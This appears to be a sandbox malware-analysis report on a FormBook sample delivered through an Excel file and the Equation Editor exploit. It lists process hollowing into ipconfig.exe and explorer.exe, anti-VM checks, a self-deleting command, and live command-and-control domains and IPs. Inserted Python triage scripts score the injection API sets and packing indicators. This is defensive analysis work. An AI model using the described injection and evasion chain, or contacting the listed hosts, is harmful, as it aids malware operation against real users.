      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D81C0 NtCreateFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D8270 NtReadFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D82F0 NtClose,
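Read together, the rows above give the set of Nt* syscalls the unpacked code in vbc.exe and the hollowed ipconfig.exe resolve, and that set is the process-hollowing and thread-injection chain the later signatures name: NtCreateProcessEx, NtCreateSection with NtMapViewOfSection and NtUnmapViewOfSection, NtWriteVirtualMemory and NtProtectVirtualMemory, NtGetContextThread and NtSetContextThread, NtQueueApcThread, NtResumeThread. The following Python is an added example and not part of the Joe Sandbox report: it parses rows in exactly this format, collects the API set per image and scores it against that chain. The chain membership, the 0.7 threshold and the notepad.exe rows are assumptions made for illustration; the vbc.exe rows are copied from the report.

```python
"""Added example, not part of the sandbox report: pull the Nt* syscalls
each process resolved out of "Code function" rows like the ones above and
score the set against the API chain used for process hollowing and
APC/thread-context injection."""
import re
from collections import defaultdict

# A report row looks like
#   Source: <image path>Code function: <pid>_<run>_<addr> NtXxx,LdrInitializeThunk,
# The HTML-to-text export drops the column separator before "Code function",
# so the image path is everything between "Source:" and that literal
# (a " - " separator, if one is present, is tolerated and stripped).
ROW_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s*Code function:\s*"
    r"(?P<func>[0-9A-Fa-f_]+)\s*(?P<apis>(?:Nt\w+,)+)?"
)

# Syscalls that make up a hollowing / thread-injection chain: create or open
# a target, map a section or write a PE into it, then hijack a thread.
INJECTION_APIS = frozenset({
    "NtCreateProcessEx", "NtCreateSection", "NtMapViewOfSection",
    "NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtProtectVirtualMemory",
    "NtGetContextThread", "NtSetContextThread", "NtQueueApcThread",
    "NtResumeThread",
})


def collect_apis(rows):
    """Map each image path to the set of Nt* names resolved by that process."""
    seen = defaultdict(set)
    for row in rows:
        m = ROW_RE.search(row)
        if not m or not m.group("apis"):
            continue  # rows without a resolved API, or "String function" rows
        image = m.group("image").rstrip(" -")
        for api in m.group("apis").rstrip(",").split(","):
            if api.startswith("Nt"):
                seen[image].add(api)
    return dict(seen)


def injection_score(apis):
    """Fraction of INJECTION_APIS present, plus the matched names."""
    hit = sorted(apis & INJECTION_APIS)
    return len(hit) / len(INJECTION_APIS), hit


def triage(rows, threshold=0.7):
    """Per image: score, matched chain members and a verdict."""
    result = {}
    for image, apis in collect_apis(rows).items():
        score, hit = injection_score(apis)
        result[image] = {"score": round(score, 2), "matched": hit,
                         "flag": score >= threshold}
    return result


# Constructed input: vbc.exe rows copied from the report's format above, plus
# a hypothetical notepad.exe with only file I/O to show a non-match.
SAMPLE_ROWS = [
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A700C4 NtCreateFile,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70078 NtResumeThread,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71930 NtSetContextThread,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70C40 NtGetContextThread,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FE24 NtWriteVirtualMemory,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFFC NtCreateProcessEx,",
    r"Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FF34 NtQueueApcThread,",
    r"Source: C:\Users\Public\vbc.exeCode function: String function: 00A7DF5C appears 107 times",
    r"Source: C:\Windows\System32\notepad.exeCode function: 3_2_00401000 NtCreateFile,",
    r"Source: C:\Windows\System32\notepad.exeCode function: 3_2_00401040 NtClose,",
]

if __name__ == "__main__":
    for image, verdict in triage(SAMPLE_ROWS).items():
        print(image, verdict)
```

The score deliberately ignores how many times an API appears and in which process instance; what matters for the verdict is that one image resolves most of the chain, which ordinary applications never do. Legitimate debuggers and some AV components also touch NtSetContextThread or NtQueueApcThread, so treat the score as a triage signal rather than a conviction.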
Source: C:\Windows\explorer.exe - Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\ipconfig.exe - Process Stats: CPU usage > 98%
Source: C:\Users\Public\vbc.exe - Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe - Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe - Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe - Memory allocated: 76E90000 page execute and read and write
Source: vbc[1].exe.4.dr - Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr - Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ORDER CONFIRMATION.xlsx - Virustotal: Detection: 32%
Source: ORDER CONFIRMATION.xlsx - ReversingLabs: Detection: 29%
Source: C:\Users\Public\vbc.exe - Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown - Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown - Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe - Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe - Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe - Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe - Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - File created: C:\Users\user\Desktop\~$ORDER CONFIRMATION.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - File created: C:\Users\user\AppData\Local\Temp\CVRF298.tmp
Source: classification engine - Classification label: mal100.troj.expl.evad.winXLSX@12/19@22/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe - Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmp - Binary or memory string: .VBPud<_
Source: vbc[1].exe.4.dr, Forms/mainForm.cs - Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: vbc.exe.4.dr, Forms/mainForm.cs - Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs - Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs - Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs - Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs - Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Windows\explorer.exe - File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder - Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe - File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ipconfig.pdb source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe

Data Obfuscation:

.NET source code contains potential unpacker
Source: vbc[1].exe.4.dr, Forms/mainForm.cs - .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, Forms/mainForm.cs - .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs - .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs - .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs - .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs - .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.200000.1.unpack, Forms/mainForm.cs - .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs - .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\Public\vbc.exe - Code function: 6_2_001E4D58 push esp; ret
Source: C:\Users\Public\vbc.exe - Code function: 6_2_001E879A push edx; retf
Source: C:\Users\Public\vbc.exe - Code function: 6_2_001E87CE push ds; retf
Source: C:\Users\Public\vbc.exe - Code function: 8_2_00415080 push esi; ret
Source: C:\Users\Public\vbc.exe - Code function: 8_2_00416235 push edi; iretd
Source: C:\Users\Public\vbc.exe - Code function: 8_2_0041B3B5 push eax; ret
Source: C:\Users\Public\vbc.exe - Code function: 8_2_0041B46C push eax; ret
Source: C:\Users\Public\vbc.exe - Code function: 8_2_0041B402 push eax; ret
Source: C:\Users\Public\vbc.exe - Code function: 8_2_0041B40B push eax; ret
Source: C:\Users\Public\vbc.exe - Code function: 8_2_00A7DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\ipconfig.exe - Code function: 11_2_01F4DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\ipconfig.exe - Code function: 11_2_000D5080 push esi; ret
Source: C:\Windows\SysWOW64\ipconfig.exe - Code function: 11_2_000D6235 push edi; iretd
Source: C:\Windows\SysWOW64\ipconfig.exe - Code function: 11_2_000DB3B5 push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe - Code function: 11_2_000DB40B push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe - Code function: 11_2_000DB402 push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe - Code function: 11_2_000DB46C push eax; ret
Source: vbc[1].exe.4.dr - Static PE information: 0x82CF36F5 [Mon Jul 18 16:08:21 2039 UTC]
Source: initial sample - Static PE information: section name: .text entropy: 7.19334150193 (2 occurrences)
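Two of the static rows above are cheap but reliable packer indicators: a PE TimeDateStamp of 0x82CF36F5, which decodes to a link date in July 2039, and a .text section entropy of 7.19 bits per byte, far above what compiled code normally shows. The following Python is an added example and not part of the report or of Joe Sandbox: it implements both checks with the standard library only. The header fields are passed in directly rather than read from a PE (a real triage script would take them from the file, for example with pefile); the 7.0 entropy cut-off and the one-day clock slack are assumptions, and the pseudo-random filler standing in for a packed section is constructed.

```python
"""Added example, not from the report: two stdlib-only static checks behind
the rows above, a PE TimeDateStamp decoder with a future-date check and a
Shannon entropy measure for a section."""
import hashlib
import math
from collections import Counter
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def decode_timestamp(stamp):
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch (UTC)."""
    return EPOCH + timedelta(seconds=stamp)


def timestamp_is_plausible(stamp, now=None, slack=timedelta(days=1)):
    """False when the claimed link time lies in the future beyond clock skew,
    or is zero; packers and build-time tampering commonly leave such values."""
    now = now or datetime.now(timezone.utc)
    return stamp != 0 and decode_timestamp(stamp) <= now + slack


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_looks_packed(data, threshold=7.0):
    """Code sections of ordinary compiled binaries sit well below 7 bits/byte;
    compressed or encrypted payloads approach 8. The 7.0 cut-off is a common
    heuristic (assumption), not a hard rule."""
    return shannon_entropy(data) >= threshold


def static_triage(stamp, text_section, now=None):
    """Return the findings a report would list for these two header fields."""
    findings = []
    if not timestamp_is_plausible(stamp, now):
        when = decode_timestamp(stamp).strftime("%a %b %d %H:%M:%S %Y UTC")
        findings.append("timestamp: %s (implausible)" % when)
    if section_looks_packed(text_section):
        findings.append(".text entropy %.2f (likely packed)" % shannon_entropy(text_section))
    return findings


# Constructed input: the TimeDateStamp reported for vbc[1].exe above, and a
# deterministic pseudo-random blob standing in for a packed .text section.
REPORT_STAMP = 0x82CF36F5


def pseudo_random_bytes(n, seed=b"constructed sample"):
    """High-entropy filler built from a SHA-256 chain (constructed test data)."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


if __name__ == "__main__":
    for finding in static_triage(REPORT_STAMP, pseudo_random_bytes(65536)):
        print(finding)
```

The entropy figure only says the bytes are incompressible; whether that is a packer, an embedded encrypted payload (the decryptor calls in Forms/mainForm.cs point that way here) or legitimate compressed resources has to be decided from the section's name and flags, which is why the report also lists the .text section characteristics.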

Persistence and Installation Behavior:

Uses ipconfig to look up or modify the Windows network settings
Source: C:\Users\Public\vbc.exe - Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - File created: C:\Users\Public\vbc.exe (2 occurrences)

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - Process information set: NOOPENFILEERRORBOX (10 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - Process information set: NOOPENFILEERRORBOX (8 occurrences)
Source: C:\Users\Public\vbc.exe - Process information set: NOOPENFILEERRORBOX (23 occurrences)
Source: C:\Windows\SysWOW64\ipconfig.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match - File source: 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: vbc.exe PID: 2976, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe - RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe - RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe - RDTSC instruction interceptor: First address: 00000000000C85E4 second address: 00000000000C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe - RDTSC instruction interceptor: First address: 00000000000C897E second address: 00000000000C8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1868 - Thread sleep time: -180000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1828 - Thread sleep time: -38487s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1016 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe - Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe - Last function: Thread delayed
Source: C:\Users\Public\vbc.exe - Code function: 8_2_004088B0 rdtsc
Source: C:\Users\Public\vbc.exe - Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe - Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe - Thread delayed: delay time: 38487
Source: C:\Users\Public\vbc.exe - Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmp - Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.487770072.000000000457A000.00000004.00000001.sdmp - Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000009.00000000.487770072.000000000457A000.00000004.00000001.sdmp - Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000009.00000000.499415292.000000000029B000.00000004.00000020.sdmp - Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000009.00000000.523219714.00000000045D6000.00000004.00000001.sdmp - Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000009.00000000.505298411.00000000083A6000.00000004.00000001.sdmp - Binary or memory string: .SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp - Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe - Code function: 8_2_004088B0 rdtsc
Source: C:\Users\Public\vbc.exe - Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\SysWOW64\ipconfig.exe - Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe - Code function: 8_2_00A826F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe - Code function: 11_2_01F526F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe - Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe - Process queried: DebugPort
Source: C:\Users\Public\vbc.exe - Code function: 8_2_00409B20 LdrLoadDll,
Source: C:\Users\Public\vbc.exe - Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe - Domain query: www.americanstonesusa.com
Source: C:\Windows\explorer.exe - Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe - Domain query: www.realstyleworks.com
Source: C:\Windows\explorer.exe - Domain query: www.plasticplank.com
Source: C:\Windows\explorer.exe - Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe - Network Connect: 192.99.131.252 80
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe - Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 2F0000
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write (2 occurrences)
Source: C:\Users\Public\vbc.exe - Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\ipconfig.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\Public\vbc.exe - Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe - Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe - Thread register set: target process: 1764 (2 occurrences)
Source: C:\Windows\SysWOW64\ipconfig.exe - Thread register set: target process: 1764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe - Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe - Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe - Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe - Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmp - Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmp - Binary or memory string: ProgmanG
Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmp - Binary or memory string: !Progman
Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmp - Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe - Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; file source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; file sources: the same nine memory dumps listed under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

One tactic per line. A number after a technique name is the report's own counter for that technique, kept as extracted.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Shared Modules 1; Exploitation for Client Execution 13; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Process Injection 612; Extra Window Memory Injection 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Masquerading 111; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 31; Process Injection 612; Deobfuscate/Decode Files or Information 11; Obfuscated Files or Information 3; Software Packing 13; Timestomp 1; Extra Window Memory Injection 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery 221; Process Discovery 2; Virtualization/Sandbox Evasion 31; Remote System Discovery 1; System Network Configuration Discovery 1; File and Directory Discovery 1; System Information Discovery 113; Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data 11; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
